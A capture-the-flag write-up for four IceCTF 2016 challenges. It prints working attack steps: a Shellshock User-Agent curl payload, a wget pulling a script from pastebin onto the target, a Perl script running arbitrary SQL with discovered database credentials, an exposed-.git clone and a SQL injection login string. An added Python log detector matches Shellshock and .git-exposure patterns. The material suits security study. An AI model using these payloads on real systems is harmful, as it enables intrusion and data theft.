IceCTF 2016 More Challs by Birdy42

Demo

So I didn't know what the basename function returned and didn't want to spend a lot of time reading the docs.

I copied the original program and updated it to print what basename would return:

  mkdir /tmp/bi
  cd /tmp/bi
  cp /home/demo/demo.c /tmp/bi
  vi /tmp/bi/demo.c

I added a printf of the basename result and it printed:

  demo

So I realized we just had to make the basename match icesh, so I created a shell script that runs the original binary under that name:

  vi /tmp/bi/icesh

  #!/bin/sh
  /home/demo/demo

Then I ran it and got the shell:

  /tmp/bi/icesh
  cat /home/demo/flag.txt

Exposed

In this challenge we realized there was a flaw in the git configuration: the .git directory was served by the website, so we were able to clone the source files.

To get any repository from the website:

  mkdir exposed
  cd exposed
  git init
  git remote add origin http://exposed.vuln.icec.tf/.git
  git pull origin _hash_

The list of commit hashes was in the reflog file:

  wget http://exposed.vuln.icec.tf/.git/logs/refs/heads/master

(Note: the file is not the same as the cloned one.) The flag was located in the index.php file.

GeoIP

The team found that we could get RCE through the User-Agent header with this command:

  curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh select \* from 47a6fd2ca39d2b0d6eea1c30008dd889'" http://geocities.vuln.icec.tf/index.cgi

So I used pastebin to load code onto the box:

  wget -P /tmp/bi/ http://pastebin....

I used the following file, which joins all its arguments into one SQL statement and runs it against the challenge database:

  #!/usr/bin/perl
  use strict;
  use warnings;
  use DBI;

  # Every command-line argument, joined with spaces, becomes the query text.
  my $my_cmd = join(" ", @ARGV);
  print "$my_cmd\n";

  # Credentials and host as found in the challenge's own configuration.
  my $dbh = DBI->connect(
      "dbi:mysql:dbname=geocities;host=icectf_mariadb",
      "geocities",
      "geocities",
      { RaiseError => 1 },
  ) or die $DBI::errstr;

  my $sth = $dbh->prepare($my_cmd);
  $sth->execute();

  # Print each result row on its own line.
  while (my $row = $sth->fetchrow_arrayref()) {
      print "@$row\n";
  }
  $sth->finish();
  $dbh->disconnect();

Then I could query the DB easily using the script, with all the arguments of the Perl script concatenated as the MySQL query:

  curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh sql_query'" http://geocities.vuln.icec.tf/index.cgi

Query: show tables;

  Posts
  47a6fd2ca39d2b0d6eea1c30008dd889

Query (note that * must be escaped in bash): select \* from 47a6fd2ca39d2b0d6eea1c30008dd889;

  IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}

We got the flag!
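Both the Exposed and GeoIP challenges leave a distinctive trace in a web server's access log: requests into a served .git directory, and a bash function definition (`() {`) at the start of the User-Agent header. The following detector, an added example written for this page and not part of the original writeup, flags both patterns over constructed combined-format log lines; the IPs, timestamps and User-Agent strings are made up for the sample.

```python
import re

# Constructed sample access-log lines in combined log format (not taken from the writeup).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Aug/2016:12:00:01 +0000] "GET /index.cgi HTTP/1.1" 200 512 "-" '
    '"() { test;};echo \\"Content-type: text/plain\\"; echo; echo;/bin/bash -c \'id\'"',
    '10.0.0.7 - - [10/Aug/2016:12:00:02 +0000] "GET /.git/logs/HEAD HTTP/1.1" 200 2048 "-" "Wget/1.17"',
    '10.0.0.9 - - [10/Aug/2016:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# Combined log format: the request line is the first quoted field, the User-Agent the last one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$'
)
# A bash function definition at the start of an environment value is the Shellshock trigger.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
# Any request path that reaches into a served .git directory.
GIT_RE = re.compile(r"(^|/)\.git(/|$)")


def classify(line):
    """Return (client_ip, [tags]) for one log line, or None when the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = []
    if SHELLSHOCK_RE.search(m["ua"]):
        tags.append("shellshock-ua")
    if GIT_RE.search(m["path"]):
        tags.append("git-exposure")
        if m["status"] == "200":
            tags.append("git-served")  # the server answered, so the repository really is exposed
    return m["ip"], tags


def scan(lines):
    """Map each client IP with at least one finding to the set of tags observed for it."""
    hits = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            ip, tags = parsed
            hits.setdefault(ip, set()).update(tags)
    return hits


if __name__ == "__main__":
    for ip, tags in sorted(scan(SAMPLE_LOG).items()):
        print(ip, sorted(tags))
```

A "git-served" hit is the one to act on first: a 200 response for a .git path means the repository, including its reflog with every commit hash, is downloadable exactly as in the Exposed challenge.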

Miners

This one was really easy: it said you must log in, but there are no users in the database. The source code showed an obvious SQLi flaw in the username field.

  username:
  asdf' union select 1,2,3 #

I was logged in and had the flag.